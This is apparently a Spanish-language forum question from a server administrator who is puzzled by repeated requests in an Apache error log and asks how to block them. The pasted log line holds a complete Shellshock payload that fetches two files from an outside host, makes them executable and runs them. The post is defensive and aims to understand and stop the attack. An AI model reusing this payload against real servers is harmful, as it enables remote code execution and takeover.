En mis archivos de registro veo cientos de estos registros. Tengo que decir que la ip del cliente cambia a veces. Así que hay 3 o 4 ips enviando estas solicitudes ...
El othersite.something (que he pedido) es siempre el mismo.
[Sat Apr 11 21:34:13 2015] [error] [client xx.xxx.xx.xxx] script not found or unable to stat: /home/Myuser/web/myweb.something/cgi-bin/php5-cli, referer: () { :;} ;echo;/usr/local/bin/php -r '$a = "http://othersite.something//Help1";''$b = "http://othersite.something//Help2";''$c = sys_get_temp_dir();''$d = "Help1";''$e = "Help2";''$f = "chmod 777";''$g = "file_put_contents";''$h = "system";''$i = "file_exists";''$j = "fopen";''if ($i($c . "/$d"))''{''exit(1);''}else{''echo($c);''$g("$c/$d", $j("$a", "r"));''$g("$c/$e", $j("$b", "r"));''$h("$f " . $c ."/$d");''$h("$f " . $c ."/$e");''$h($c . "/$d");''$h($c . "/$e");''}'
¿Algún ataque está intentando usar mi servidor para hacer algo en otro servidor (othersite.something)?
¿O este ataque es contra mi servidor?
He visto que todos los registros aparecen como [errores] pero me gustaría detenerlos después de x intentos fallidos ...
Pero parece que fail2ban no está funcionando correctamente.
También debo decir que no estoy usando la carpeta cgi-bin ... no hay nada en el interior ... ¿podría simplemente configurar los permisos 640 o 600 para evitar esto?